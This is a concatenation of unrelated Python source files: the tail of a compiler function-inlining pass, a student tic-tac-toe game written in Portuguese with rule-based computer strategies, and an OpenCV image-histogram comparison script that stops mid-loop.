    Heavier constructs (conditionals, nested functions) contribute more
    than trivial ones; bare names and scalars score nothing.
    """

    def visit_block(self, node: lowered.Block) -> int:
        total = 5
        for expr in node.body:
            total += expr.visit(self)
        return total

    def visit_cond(self, node: lowered.Cond) -> int:
        branches = (node.pred, node.cons, node.else_)
        return 6 + sum(branch.visit(self) for branch in branches)

    def visit_define(self, node: lowered.Define) -> int:
        return 4 + node.value.visit(self)

    def visit_func_call(self, node: lowered.FuncCall) -> int:
        args_score = sum(self.run(arg) for arg in node.args)
        return 2 + node.func.visit(self) + args_score

    def visit_function(self, node: lowered.Function) -> int:
        return 7 + node.body.visit(self)

    def visit_name(self, node: lowered.Name) -> int:
        return 0

    def visit_native_operation(self, node: lowered.NativeOperation) -> int:
        score = 1 + node.left.visit(self)
        if node.right is not None:
            score += node.right.visit(self)
        return score

    def visit_scalar(self, node: lowered.Scalar) -> int:
        return 0

    def visit_vector(self, node: lowered.Vector) -> int:
        inner = sum(elem.visit(self) for elem in node.elements)
        # A vector whose elements cost nothing is treated as free.
        return (3 + inner) if inner else 0
class _Finder(visitor.LoweredASTVisitor[None]):
    """Walk the AST collecting every function node.

    `funcs` lists all functions encountered; `defined_funcs` records the
    subset bound directly to a name by a `Define` node.
    """

    def __init__(self) -> None:
        self.funcs: List[lowered.Function] = []
        self.defined_funcs: Set[lowered.Function] = set()

    def visit_block(self, node: lowered.Block) -> None:
        for expr in node.body:
            expr.visit(self)

    def visit_cond(self, node: lowered.Cond) -> None:
        for branch in (node.pred, node.cons, node.else_):
            branch.visit(self)

    def visit_define(self, node: lowered.Define) -> None:
        node.value.visit(self)
        value = node.value
        if isinstance(value, lowered.Function):
            self.defined_funcs.add(value)

    def visit_func_call(self, node: lowered.FuncCall) -> None:
        node.func.visit(self)
        for argument in node.args:
            argument.visit(self)

    def visit_function(self, node: lowered.Function) -> None:
        node.body.visit(self)
        self.funcs.append(node)

    def visit_name(self, node: lowered.Name) -> None:
        pass

    def visit_native_operation(self, node: lowered.NativeOperation) -> None:
        node.left.visit(self)
        if node.right is not None:
            node.right.visit(self)

    def visit_scalar(self, node: lowered.Scalar) -> None:
        pass

    def visit_vector(self, node: lowered.Vector) -> None:
        for element in node.elements:
            element.visit(self)
class _Inliner(visitor.LoweredASTVisitor[lowered.LoweredASTNode]):
    """Rebuild the AST, replacing calls to chosen functions with their bodies."""

    def __init__(self, targets: Collection[lowered.Function]) -> None:
        self.current_scope: Scope[lowered.Function] = Scope(None)
        self.targets: Collection[lowered.Function] = targets

    def is_target(self, node: lowered.LoweredASTNode) -> bool:
        """Check whether a function node is marked for inlining."""
        return any(node == candidate for candidate in self.targets)

    def visit_block(self, node: lowered.Block) -> lowered.Block:
        new_body = [expr.visit(self) for expr in node.body]
        return lowered.Block(node.span, new_body)

    def visit_cond(self, node: lowered.Cond) -> lowered.Cond:
        return lowered.Cond(
            node.span,
            node.pred.visit(self),
            node.cons.visit(self),
            node.else_.visit(self),
        )

    def visit_define(self, node: lowered.Define) -> lowered.Define:
        new_value = node.value.visit(self)
        if isinstance(new_value, lowered.Function):
            # Remember the binding so later calls through this name inline it.
            self.current_scope[node.target] = new_value
        return lowered.Define(node.span, node.target, new_value)

    def visit_func_call(self, node: lowered.FuncCall) -> lowered.LoweredASTNode:
        callee = node.func.visit(self)
        new_args = [arg.visit(self) for arg in node.args]
        if self.is_target(callee):
            return inline_function(node.span, callee, new_args)
        if isinstance(callee, lowered.Name) and callee in self.current_scope:
            return inline_function(node.span, self.current_scope[callee], new_args)
        return lowered.FuncCall(node.span, callee, new_args)

    def visit_function(self, node: lowered.Function) -> lowered.Function:
        return lowered.Function(node.span, node.params, node.body.visit(self))

    def visit_name(self, node: lowered.Name) -> lowered.Name:
        return node

    def visit_native_operation(
        self, node: lowered.NativeOperation
    ) -> lowered.NativeOperation:
        new_right = None if node.right is None else node.right.visit(self)
        return lowered.NativeOperation(
            node.span, node.operation, node.left.visit(self), new_right
        )

    def visit_scalar(self, node: lowered.Scalar) -> lowered.Scalar:
        return node

    def visit_vector(self, node: lowered.Vector) -> lowered.Vector:
        new_elements = [elem.visit(self) for elem in node.elements]
        return lowered.Vector(node.span, node.vec_type, new_elements)
class _Replacer(visitor.LoweredASTVisitor[lowered.LoweredASTNode]):
    """
    Rebuild an AST fragment, substituting every name found in `inlined`
    with the expression it maps to (used to splice call arguments into an
    inlined function body).

    NOTE: this class previously cached a single shared instance through
    `__new__`. Because `__init__` reassigned `inlined` on every
    construction anyway, the cache provided no benefit while making any
    nested/recursive replacement share mutable state, so the singleton
    machinery has been removed.
    """

    def __init__(self, inlined: Scope[lowered.LoweredASTNode]) -> None:
        # Maps parameter names to the argument nodes that replace them.
        self.inlined: Scope[lowered.LoweredASTNode] = inlined

    def run(self, node: lowered.LoweredASTNode) -> lowered.LoweredASTNode:
        # An empty substitution map means the tree can be returned untouched.
        return node.visit(self) if self.inlined else node

    def visit_block(self, node: lowered.Block) -> lowered.Block:
        return lowered.Block(node.span, [expr.visit(self) for expr in node.body])

    def visit_cond(self, node: lowered.Cond) -> lowered.Cond:
        return lowered.Cond(
            node.span,
            node.pred.visit(self),
            node.cons.visit(self),
            node.else_.visit(self),
        )

    def visit_define(self, node: lowered.Define) -> lowered.Define:
        return lowered.Define(node.span, node.target, node.value.visit(self))

    def visit_func_call(self, node: lowered.FuncCall) -> lowered.LoweredASTNode:
        return lowered.FuncCall(
            node.span,
            node.func.visit(self),
            [arg.visit(self) for arg in node.args],
        )

    def visit_function(self, node: lowered.Function) -> lowered.Function:
        # Parameters of a nested function shadow outer names, so they are
        # stripped from the substitution map while visiting its body.
        original_inlined = self.inlined
        str_params = [param.value for param in node.params]
        edited = {key: value for key, value in self.inlined if key not in str_params}
        self.inlined = Scope.from_dict(edited)
        new_body = node.body.visit(self)
        self.inlined = original_inlined
        return lowered.Function(node.span, node.params, new_body)

    def visit_name(self, node: lowered.Name) -> lowered.LoweredASTNode:
        return self.inlined[node] if node in self.inlined else node

    def visit_native_operation(
        self, node: lowered.NativeOperation
    ) -> lowered.NativeOperation:
        return lowered.NativeOperation(
            node.span,
            node.operation,
            node.left.visit(self),
            None if node.right is None else node.right.visit(self),
        )

    def visit_scalar(self, node: lowered.Scalar) -> lowered.Scalar:
        return node

    def visit_vector(self, node: lowered.Vector) -> lowered.Vector:
        return lowered.Vector(
            node.span, node.vec_type, [elem.visit(self) for elem in node.elements]
        )
def generate_targets(
    funcs: Sequence[lowered.Function],
    defined_funcs: Collection[lowered.Function],
    threshold: int = 0,
) -> Collection[lowered.Function]:
    """
    Pick the functions whose inlining score fits inside *threshold*.

    Parameters
    ----------
    funcs: Sequence[lowered.Function]
        All the `Function` nodes found in the AST.
    defined_funcs: Collection[lowered.Function]
        The functions that are directly tied to a `Define` node.
    threshold: int
        The highest score allowed in the result; `0` accepts every
        function regardless of score.

    Returns
    -------
    Collection[lowered.Function]
        The function nodes considered cheap enough to inline.
    """
    scorer = _Scorer()
    chosen = []
    for func in funcs:
        # Functions bound to a name cost less to inline than anonymous ones.
        total = scorer.run(func.body) + (1 if func in defined_funcs else 3)
        if threshold == 0 or total <= threshold:
            chosen.append(func)
    return chosen
def inline_function(
    span: Tuple[int, int],
    func: lowered.Function,
    args: Sequence[lowered.LoweredASTNode],
) -> lowered.LoweredASTNode:
    """Merge a function and its arguments to produce an expression."""
    substitutions = {param.value: arg for param, arg in zip(func.params, args)}
    new_body = _Replacer(Scope.from_dict(substitutions)).run(func.body)
    new_body.span = span
    return new_body
| StarcoderdataPython |
6444243 | <filename>ProjetoGaloFinal.py
# <NAME> 99108
def eh_posicao_marcada(pm):
    """Return True when *pm* is a marked position, i.e. the int 1 or -1.

    :param pm: Candidate marked position.
    :return: A bool, whether the argument is a valid mark.
    """
    return type(pm) == int and pm in (1, -1)
def eh_tabuleiro(tab):
    """Return True when *tab* is a valid board: a tuple of three tuples of
    three ints, every cell being -1, 0 or 1.

    :param tab: Candidate board.
    :return: A bool, whether the argument is a valid board.
    """
    if not isinstance(tab, tuple) or len(tab) != 3:
        return False
    for row in tab:
        if not isinstance(row, tuple) or len(row) != 3:
            return False
        for cell in row:
            if type(cell) != int or cell not in (-1, 0, 1):
                return False
    return True
def eh_posicao(p):
    """Return True when *p* is a board position, i.e. an int from 1 to 9.

    :param p: Candidate board position.
    :return: A bool, whether the argument is a valid position.
    """
    return type(p) == int and 1 <= p <= 9
def obter_coluna(tab, c):
    """Return column *c* (1..3) of *tab* as a tuple, top to bottom.

    :param tab: A tuple, the board.
    :param c: An int, the column number (1 to 3).
    :return: A tuple, the requested column.
    :raises ValueError: if either argument is invalid.
    """
    if not eh_tabuleiro(tab) or type(c) != int or not 1 <= c <= 3:
        raise ValueError('obter_coluna: algum dos argumentos e invalido')
    return tuple(row[c - 1] for row in tab)
def obter_linha(tab, li):
    """Return row *li* (1..3) of *tab* as a tuple.

    Fixes a pointless loop in the original that reassigned its own index
    and returned on the first iteration; rows map directly onto the three
    inner tuples of the board.

    :param tab: A tuple, the board.
    :param li: An int, the row number (1 to 3).
    :return: A tuple, the requested row.
    :raises ValueError: if either argument is invalid.
    """
    if not eh_tabuleiro(tab) or type(li) != int or not 1 <= li <= 3:
        raise ValueError('obter_linha: algum dos argumentos e invalido')
    return tab[li - 1]
def obter_diagonal(tab, d):
    """Return diagonal *d* of *tab* as a tuple.

    d == 1 is the descending diagonal, top-left to bottom-right
    (cells 1, 5, 9); d == 2 is the ascending diagonal, bottom-left to
    top-right (cells 7, 5, 3).

    The original implementation reversed `tab` inside the loop on every
    iteration for d == 2, so it only worked because consecutive reversals
    cancelled out; this version indexes the cells directly and produces
    the same triples.

    :param tab: A tuple, the board.
    :param d: An int, the diagonal number (1 or 2).
    :return: A tuple, the requested diagonal.
    :raises ValueError: if either argument is invalid.
    """
    if not eh_tabuleiro(tab) or type(d) != int or not 1 <= d <= 2:
        raise ValueError('obter_diagonal: algum dos argumentos e invalido')
    if d == 1:
        return tuple(tab[i][i] for i in range(3))
    # Ascending: walk from the bottom-left corner up to the top-right.
    return tuple(tab[2 - i][i] for i in range(3))
def tabuleiro_posicoes(tab):
    """Flatten *tab* into a 9-tuple of cells, indexed 0..8 row by row.

    :param tab: A tuple, the board.
    :return: A tuple, the flattened board.
    :raises ValueError: if the argument is not a valid board.
    """
    if not eh_tabuleiro(tab):
        raise ValueError('tabuleiro_posicoes: o argumento e invalido')
    return tuple(cell for row in tab for cell in row)
def tabuleiro_str(tab):
    """Return the external (printable) representation of *tab*.

    Marks render as 'X' (1), 'O' (-1) and ' ' (0); rows are separated by
    a line of dashes.

    :param tab: A tuple, the board.
    :return: A str, the board's external representation.
    :raises ValueError: if the argument is not a valid board.
    """
    if not eh_tabuleiro(tab):
        raise ValueError('tabuleiro_str: o argumento e invalido')
    simbolos = {1: 'X', -1: 'O', 0: ' '}
    linhas = []
    for row in tab:
        linhas.append(' ' + ' | '.join(simbolos[cell] for cell in row) + ' ')
    return '\n-----------\n'.join(linhas)
def converte_posicao(tab, p):
    """Return the cell value (-1, 0 or 1) stored at board position *p*.

    :param tab: A tuple, the board.
    :param p: An int, the board position (1 to 9).
    :return: An int, the cell value at that position.
    :raises ValueError: if either argument is invalid.
    """
    if not eh_tabuleiro(tab) or not eh_posicao(p):
        raise ValueError('converte_posicao: algum dos argumentos e invalido')
    # Positions 1..9 map row-major onto (row, column) pairs.
    linha, coluna = divmod(p - 1, 3)
    return obter_linha(tab, linha + 1)[coluna]
def eh_posicao_livre(tab, p):
    """Return True when position *p* of *tab* is free (its cell is 0).

    :param tab: A tuple, the board.
    :param p: An int, the board position (1 to 9).
    :return: A bool, whether the position is free.
    :raises ValueError: if either argument is invalid.
    """
    if not eh_tabuleiro(tab) or not eh_posicao(p):
        raise ValueError('eh_posicao_livre: algum dos argumentos e invalido')
    # Cells are -1, 0 or 1 (guaranteed by eh_tabuleiro), so free means 0.
    return converte_posicao(tab, p) == 0
def obter_posicoes_livres(tab):
    """Return an ordered tuple of every free position (1..9) of *tab*.

    :param tab: A tuple, the board.
    :return: A tuple, the free positions in ascending order.
    :raises ValueError: if the argument is not a valid board.
    """
    if not eh_tabuleiro(tab):
        raise ValueError('obter_posicoes_livres: o argumento e invalido')
    return tuple(p for p in range(1, 10) if eh_posicao_livre(tab, p))
def jogador_ganhador(tab):
    """Return the winner of *tab*: 1 ('X'), -1 ('O'), or 0 if nobody won.

    :param tab: A tuple, the board.
    :return: An int identifying the winning player, or 0.
    :raises ValueError: if the argument is not a valid board.
    """
    if not eh_tabuleiro(tab):
        raise ValueError('jogador_ganhador: o argumento e invalido')
    # For each index, test the row first and then the column, as the
    # original did, before falling back to the two diagonals.
    for n in (1, 2, 3):
        for trio in (obter_linha(tab, n), obter_coluna(tab, n)):
            if trio[0] == trio[1] == trio[2]:
                return trio[0]
    for d in (1, 2):
        trio = obter_diagonal(tab, d)
        if trio[0] == trio[1] == trio[2]:
            return trio[0]
    return 0
def marcar_posicao(tab, pm, pl):
    """Return a new board with player *pm*'s mark placed at free position *pl*.

    :param tab: A tuple, the board.
    :param pm: An int, the player's mark: 1 for 'X', -1 for 'O'.
    :param pl: An int, a free board position (1 to 9).
    :return: A tuple, the modified board.
    :raises ValueError: if any argument is invalid or the position is taken.
    """
    if not eh_tabuleiro(tab) or not eh_posicao_marcada(pm) or not eh_posicao(pl) or not eh_posicao_livre(tab, pl):
        raise ValueError('marcar_posicao: algum dos argumentos e invalido')
    plano = list(tabuleiro_posicoes(tab))
    plano[pl - 1] = pm
    return tuple(plano[0:3]), tuple(plano[3:6]), tuple(plano[6:9])
def escolher_posicao_manual(tab):
    """Read a position typed by the human player and return it.

    :param tab: A tuple, the board.
    :return: An int, the chosen free position.
    :raises ValueError: if the board or the typed position is invalid.
    """
    if not eh_tabuleiro(tab):
        raise ValueError('escolher_posicao_manual: o argumento e invalido')
    escolha = int(input('Turno do jogador. Escolha uma posicao livre: '))
    if not eh_posicao(escolha) or not eh_posicao_livre(tab, escolha):
        raise ValueError('escolher_posicao_manual: a posicao introduzida e invalida')
    return escolha
def vitoria(tab, pm):
    """Return the free positions where player *pm* completes three in a row.

    Strategy criterion: if the player already owns two cells of a line
    (row, column or diagonal) and the third cell is free, that free cell
    wins the game.

    :param tab: A tuple, the board.
    :param pm: An int identifying the player: 1 for 'X', -1 for 'O'.
    :return: A sorted list of free positions the player should mark.
    :raises ValueError: if either argument is invalid.
    """
    if not eh_tabuleiro(tab) or not eh_posicao_marcada(pm):
        raise ValueError('vitoria: algum dos argumentos e invalido')
    pos = []  # candidate winning positions
    for i in range(1, 4):
        linha = obter_linha(tab, i)
        coluna = obter_coluna(tab, i)
        # rows: row i covers positions 3i-2, 3i-1, 3i
        if linha[0] == linha[1] == pm and eh_posicao_livre(tab, i * 3):
            pos += [i * 3]
        elif linha[0] == linha[2] == pm and eh_posicao_livre(tab, i * 3 - 1):
            pos += [i * 3 - 1]
        elif linha[1] == linha[2] == pm and eh_posicao_livre(tab, i * 3 - 2):
            pos += [i * 3 - 2]
        # columns: column i covers positions i, i+3, i+6
        elif coluna[0] == coluna[1] == pm and eh_posicao_livre(tab, i + 6):
            pos += [6 + i]
        elif coluna[0] == coluna[2] == pm and eh_posicao_livre(tab, i + 3):
            pos += [3 + i]
        elif coluna[1] == coluna[2] == pm and eh_posicao_livre(tab, i):
            pos += [i]
    for i in range(1, 3):
        diagonal = obter_diagonal(tab, i)
        # diagonals as returned by obter_diagonal: d=1 -> (1, 5, 9),
        # d=2 -> (7, 5, 3). 10 // i - i is the last cell (9 or 3);
        # i ** 3 - (i - 1) is the first cell (1 or 7); 5 is the middle.
        if diagonal[0] == diagonal[1] == pm and eh_posicao_livre(tab, 10 // i - i):
            pos += [10 // i - i]
        elif diagonal[0] == diagonal[2] == pm and eh_posicao_livre(tab, 5):
            pos += [5]
        elif diagonal[1] == diagonal[2] == pm and eh_posicao_livre(tab, i ** 3 - (i - 1)):
            pos += [i ** 3 - (i - 1)]
    return sorted(pos)
def bloqueio(tab, pm):
    """Return the free positions that block the opponent's immediate win.

    :param tab: A tuple, the board.
    :param pm: An int identifying the player: 1 for 'X', -1 for 'O'.
    :return: A sorted list of free positions the player should mark.
    :raises ValueError: if either argument is invalid.
    """
    if not eh_tabuleiro(tab) or not eh_posicao_marcada(pm):
        raise ValueError('bloqueio: algum dos argumentos e invalido')
    # Blocking is exactly finding the opponent's winning moves; pm is
    # guaranteed to be 1 or -1, so -pm is the opponent.
    return vitoria(tab, -pm)
def bifurcacao(tab, pm):
    """Return the free intersection cells that give player *pm* a fork.

    Strategy criterion: if two lines (rows/columns/diagonals) intersect,
    the player holds a mark on each of them, the opponent holds none on
    either, and the intersection cell is free, then marking that cell
    creates two simultaneous ways to win.

    :param tab: A tuple, the board.
    :param pm: An int identifying the player: 1 for 'X', -1 for 'O'.
    :return: A sorted list of free positions the player should mark.
    :raises ValueError: if either argument is invalid.
    """
    if not eh_tabuleiro(tab) or not eh_posicao_marcada(pm):
        raise ValueError('bifurcacao: algum dos argumentos e invalido')
    pos = []  # list of possible forks
    # rows crossed with columns: row r meets column c at cell (r-1)*3 + c
    for i in range(1, 4):
        if pm in obter_linha(tab, 1) and pm in obter_coluna(tab, i) and eh_posicao_livre(tab, i):
            # a mark on row 1 plus one on column i makes the free intersection a fork
            if -pm in obter_linha(tab, 1) or -pm in obter_coluna(tab, i):
                # not a fork if the opponent also sits on that row or column
                pos += []
            else:
                pos += [i]
    for i in range(1, 4):
        if pm in obter_linha(tab, 2) and pm in obter_coluna(tab, i) and eh_posicao_livre(tab, i + 3):
            # a mark on row 2 plus one on column i makes the free intersection a fork
            if -pm in obter_linha(tab, 2) or -pm in obter_coluna(tab, i):
                # not a fork if the opponent also sits on that row or column
                pos += []
            else:
                pos += [i + 3]
    for i in range(1, 4):
        if pm in obter_linha(tab, 3) and pm in obter_coluna(tab, i) and eh_posicao_livre(tab, i + 6):
            # a mark on row 3 plus one on column i makes the free intersection a fork
            if -pm in obter_linha(tab, 3) or -pm in obter_coluna(tab, i):
                # not a fork if the opponent also sits on that row or column
                pos += []
            else:
                pos += [i + 6]
    # diagonals crossed with rows and columns
    for i in range(1, 4):
        if (pm in obter_diagonal(tab, 1) and pm in obter_linha(tab, i)) \
                or (pm in obter_diagonal(tab, 1) and pm in obter_coluna(tab, i)):
            # descending diagonal meets row i / column i at cell 4i - 3
            if eh_posicao_livre(tab, -3 + 4 * i):
                if (-pm in obter_diagonal(tab, 1) or -pm in obter_linha(tab, i)) and \
                        (-pm in obter_diagonal(tab, 1) or -pm in obter_coluna(tab, i)):
                    # not a fork if the opponent blocks both crossing pairs
                    pos += []
                else:
                    pos += [-3 + 4 * i]
    for i in range(1, 4):
        if pm in obter_diagonal(tab, 2) and pm in obter_linha(tab, i) and eh_posicao_livre(tab, 1 + 2 * i):
            # ascending diagonal meets row i at cell 2i + 1
            if -pm in obter_diagonal(tab, 2) or -pm in obter_linha(tab, i):
                # not a fork if the opponent also sits on that diagonal or row
                pos += []
            else:
                pos += [1 + 2 * i]
    for i in range(1, 4):
        if pm in obter_diagonal(tab, 2) and pm in obter_coluna(tab, i) and eh_posicao_livre(tab, -2 * i + 9):
            # ascending diagonal meets column i at cell 9 - 2i
            if -pm in obter_diagonal(tab, 2) or -pm in obter_coluna(tab, i):
                # not a fork if the opponent also sits on that diagonal or column
                pos += []
            else:
                pos += [-2 * i + 9]
    return sorted(pos)
def bloqueio_bifurcacao(tab, pm):
    """Answer the opponent's fork threat.

    Strategy criterion: if the opponent has exactly one fork available,
    return it (as a list) so it can be occupied. With several opposing
    forks, answer with a forcing move instead: a free side cell when we
    own the centre, or a corner answering one of our marks when the
    opponent owns the centre.

    :param tab: A tuple, the board.
    :param pm: An int identifying the player: 1 for 'X', -1 for 'O'.
    :return: An int (single free position), a list of free positions, or
        None when no branch applies (see NOTE below).
    :raises ValueError: if either argument is invalid.
    """

    def canto_contrario(tab, pm):
        """Auxiliary: list free cells that answer one of *pm*'s corner marks.

        BUG FIX: the original indexed `tab[8]`/`tab[6]` — an IndexError on
        a 3-tuple board — and, through `or`/`and` precedence, skipped the
        free-cell check whenever the first corner matched. The flattened
        board and explicit grouping below implement the documented intent.
        NOTE(review): position 8 below is an edge, not a corner — possibly
        a typo for 7; kept as written to preserve the original candidates.
        """
        tab_p = tabuleiro_posicoes(tab)
        pos = []  # free answering cells
        if (tab_p[0] == pm or tab_p[8] == pm) and eh_posicao_livre(tab, 3):
            pos += [3]
        elif (tab_p[2] == pm or tab_p[6] == pm) and eh_posicao_livre(tab, 1):
            pos += [1]
        elif (tab_p[0] == pm or tab_p[8] == pm) and eh_posicao_livre(tab, 8):
            pos += [8]
        elif (tab_p[2] == pm or tab_p[6] == pm) and eh_posicao_livre(tab, 9):
            pos += [9]
        return sorted(pos)

    if not eh_tabuleiro(tab) or not eh_posicao_marcada(pm):
        raise ValueError('bloqueio_bifurcacao: algum dos argumentos e invalido')
    # pm is guaranteed to be 1 or -1, so the opponent is simply -pm.
    opponent = -pm
    if len(bifurcacao(tab, opponent)) > 1:  # opponent has more than one fork
        if converte_posicao(tab, 5) == pm:
            return lateral_vazio(tab)
        elif converte_posicao(tab, 5) == opponent:
            return canto_contrario(tab, pm)
        # NOTE(review): when the centre is still free, no branch applies and
        # None is returned implicitly; callers such as escolher_posicao_auto
        # would then crash on len(None) — confirm this state is unreachable.
    else:
        return bifurcacao(tab, opponent)
def centro(tab):
    """Return the centre position (5) when it is free, otherwise None.

    :param tab: A tuple, the board.
    :return: An int (5) when the centre is free, else None.
    :raises ValueError: if the argument is not a valid board.
    """
    if not eh_tabuleiro(tab):
        raise ValueError('centro: o argumento e invalido')
    return 5 if eh_posicao_livre(tab, 5) else None
def canto_oposto(tab, pm):
    """Return the free corner diagonally opposite an opponent's corner mark.

    :param tab: A tuple, the board.
    :param pm: An int identifying the player: 1 for 'X', -1 for 'O'.
    :return: An int, a free position, or None when no corner applies.
    :raises ValueError: if either argument is invalid.
    """
    if not eh_tabuleiro(tab) or not eh_posicao_marcada(pm):
        raise ValueError('canto_oposto: algum dos argumentos e invalido')
    tab_p = tabuleiro_posicoes(tab)
    # (flat index of a corner, the diagonally opposite position), in the
    # same priority order as the original chain: 1->9, 3->7, 7->3, 9->1.
    pares = ((0, 9), (2, 7), (6, 3), (8, 1))
    for indice, oposto in pares:
        marca = tab_p[indice]
        if eh_posicao_marcada(marca) and marca != pm and eh_posicao_livre(tab, oposto):
            return oposto
def canto_vazio(tab):
    """Return the first free corner (1, 3, 7 then 9), or None.

    :param tab: A tuple, the board.
    :return: An int, a free corner position, or None when all are taken.
    :raises ValueError: if the argument is not a valid board.
    """
    if not eh_tabuleiro(tab):
        raise ValueError('canto_vazio: o argumento e invalido')
    for canto in (1, 3, 7, 9):
        if eh_posicao_livre(tab, canto):
            return canto
def lateral_vazio(tab):
    """Return the first free side cell (2, 4, 6 then 8), or None.

    :param tab: A tuple, the board.
    :return: An int, a free side position, or None when all are taken.
    :raises ValueError: if the argument is not a valid board.
    """
    if not eh_tabuleiro(tab):
        raise ValueError('lateral_vazio: o argumento e invalido')
    for lateral in (2, 4, 6, 8):
        if eh_posicao_livre(tab, lateral):
            return lateral
def eh_estrategias(estr):
    """Return True when *estr* names a known computer strategy.

    :param estr: Candidate strategy name.
    :return: A bool, whether the argument is 'basico', 'normal' or 'perfeito'.
    """
    return isinstance(estr, str) and estr in ('basico', 'normal', 'perfeito')
def escolher_posicao_auto(tab, pm, estr):
    """Choose a position automatically for player *pm* using strategy *estr*.

    :param tab: A tuple, the board.
    :param pm: An int, the player's mark: 1 for 'X', -1 for 'O'.
    :param estr: A str, one of 'basico', 'normal' or 'perfeito'.
    :return: An int, the position chosen automatically.
    :raises ValueError: if any argument is invalid.
    """
    if not eh_tabuleiro(tab) or not eh_posicao_marcada(pm) or not eh_estrategias(estr):
        raise ValueError('escolher_posicao_auto: algum dos argumentos e invalido')
    elif estr == 'basico':
        return centro(tab) or canto_vazio(tab) or lateral_vazio(tab)  # 'basico' priority order
    elif estr == 'normal':
        if len(vitoria(tab, pm)) >= 1:  # 'normal' priority order: win first
            return vitoria(tab, pm)[0]
        elif len(bloqueio(tab, pm)) >= 1:  # then block the opponent's win
            return bloqueio(tab, pm)[0]
        else:
            return centro(tab) or canto_oposto(tab, pm) or canto_vazio(tab) or lateral_vazio(tab)
    elif estr == 'perfeito':
        if len(vitoria(tab, pm)) >= 1:  # 'perfeito' priority order: win first
            return vitoria(tab, pm)[0]
        elif len(bloqueio(tab, pm)) >= 1:  # then block
            return bloqueio(tab, pm)[0]
        elif len(bifurcacao(tab, pm)) >= 1:  # then fork
            return bifurcacao(tab, pm)[0]
        # NOTE(review): bloqueio_bifurcacao may return None (centre free with
        # several opposing forks), in which case len(None) raises TypeError —
        # confirm that state is unreachable in practice.
        elif bloqueio_bifurcacao(tab, pm) or len(bloqueio_bifurcacao(tab, pm)) >= 1:
            return bloqueio_bifurcacao(tab, pm) or bloqueio_bifurcacao(tab, pm)[0]
        else:
            return centro(tab) or canto_oposto(tab, pm) or canto_vazio(tab) or lateral_vazio(tab)
def jogo_do_galo(player, estr):
    """Play a complete game of noughts and crosses, human vs computer.

    :param player: A str, the human player's mark: 'X' or 'O'.
    :param estr: A str, the computer strategy ('basico', 'normal', 'perfeito').
    :return: A str, the winner's mark ('X' or 'O') or 'EMPATE' on a draw.
    :raises ValueError: if either argument is invalid.
    """

    def player_pm(player):
        """Auxiliary: convert a mark ('X'/'O') into its internal int (1/-1)."""
        if player == 'X':
            return 1
        elif player == 'O':
            return -1

    if not isinstance(player, str) or player != 'X' and player != 'O' or not eh_estrategias(estr):
        raise ValueError('jogo_do_galo: algum dos argumentos e invalido')
    print('Bem-vindo ao JOGO DO GALO.' + '\n' + 'O jogador joga com \'' + player + '\'.')
    t = ((0, 0, 0), (0, 0, 0), (0, 0, 0))
    while len(obter_posicoes_livres(t)) > 0:
        if player == 'X':
            pc = 'O'  # the human plays 'X', so the computer plays 'O'
            p = escolher_posicao_manual(t)
            print(tabuleiro_str(marcar_posicao(t, player_pm(player), p)))  # after the human picks a
            t = marcar_posicao(t, player_pm(player), p)  # position, update and show the board
            if jogador_ganhador(t) == player_pm(player):
                return player  # the human won: game over
            elif len(obter_posicoes_livres(t)) == 0:
                return 'EMPATE'  # no free positions left: draw
            p = escolher_posicao_auto(t, player_pm(pc), estr)
            print('Turno do computador' + ' ' + '(' + estr + '):' + '\n' +  # after the computer picks
                  tabuleiro_str(marcar_posicao(t, player_pm(pc), p)))  # a position (auto), update
            t = marcar_posicao(t, player_pm(pc), p)  # and show the board
            if jogador_ganhador(t) == player_pm(pc):
                return pc  # the computer won: game over
        else:
            pc = 'X'  # the human plays 'O', so the computer plays 'X'
            p = escolher_posicao_auto(t, player_pm(pc), estr)
            print('Turno do computador' + ' ' + '(' + estr + '):' + '\n' +  # after the computer picks
                  tabuleiro_str(marcar_posicao(t, player_pm(pc), p)))  # a position (auto), update
            t = marcar_posicao(t, player_pm(pc), p)  # and show the board
            if jogador_ganhador(t) == player_pm(pc):
                return pc  # the computer won: game over
            elif len(obter_posicoes_livres(t)) == 0:
                return 'EMPATE'  # no free positions left: draw
            p = escolher_posicao_manual(t)  # after the human picks a
            print(tabuleiro_str(marcar_posicao(t, player_pm(player), p)))  # position, update and
            t = marcar_posicao(t, player_pm(player), p)  # show the board
            if jogador_ganhador(t) == player_pm(player):
                return player  # the human won: game over
    return 'EMPATE'  # no free positions left: draw
| StarcoderdataPython |
3308120 | <reponame>alffore/tileimagen
"""
Pruebas de comparacion de histogramas de imagenes
https://www.pyimagesearch.com/2014/07/14/3-ways-compare-histograms-using-opencv-python/
https://docs.opencv.org/3.4/d8/dc8/tutorial_histogram_comparison.html
"""
import matplotlib.pyplot as plt
import argparse
import glob
import cv2
# construct the argument parser and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-d", "--dataset", required=True,
help="Path to the directory of images")
args = vars(ap.parse_args())
# initialize the index dictionary to store the image name
# and corresponding histograms and the images dictionary
# to store the images themselves
index = {}
images = {}
print(args["dataset"])
# loop over the image paths
for imagePath in glob.glob(args["dataset"] + "/*.jpeg"):
# extract the image filename (assumed to be unique) and
# load the image, updating the images dictionary
filename = imagePath[imagePath.rfind("/") + 1:]
image = cv2.imread(imagePath)
images[filename] = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
# extract a 3D RGB color histogram from the image,
# using 8 bins per channel, normalize, and update
# the index
hist = cv2.calcHist([image], [0, 1, 2], None, [8, 8, 8],
[0, 256, 0, 256, 0, 256])
hist = cv2.normalize(hist, hist).flatten()
index[filename] = hist
# METHOD #1: UTILIZING OPENCV
# initialize OpenCV methods for histogram comparison
OPENCV_METHODS = (
("Correlation", cv2.HISTCMP_CORREL),
("Chi-Squared", cv2.HISTCMP_CHISQR),
("Intersection", cv2.HISTCMP_INTERSECT),
("Hellinger", cv2.HISTCMP_BHATTACHARYYA))
# loop over the comparison methods
for (methodName, method) in OPENCV_METHODS:
# initialize the results dictionary and the sort
# direction
results = {}
reverse = False
# if we are using the correlation or intersection
# method, then sort the results in reverse order
if methodName in ("Correlation", "Intersection"):
reverse = True
# loop over the index
for (k, hist) in index.items():
# compute the distance between the two histograms
# using the method and update the results dictionary
d = cv2.compareHist(index["90661.jpeg"], hist, method)
results[k] = d
# sort the results
results = sorted([(v, k) for (k, v) in results.items()], reverse=reverse)
# show the query image
fig = plt.figure("Query")
ax = fig.add_subplot(1, 1, 1)
ax.imshow(images["90661.jpeg"])
plt.axis("off")
# initialize the results figure
fig = plt.figure("Results: %s" % methodName)
fig.suptitle(methodName, fontsize=20)
# loop over the results
for (i, (v, k)) in enumerate(results):
# show the result
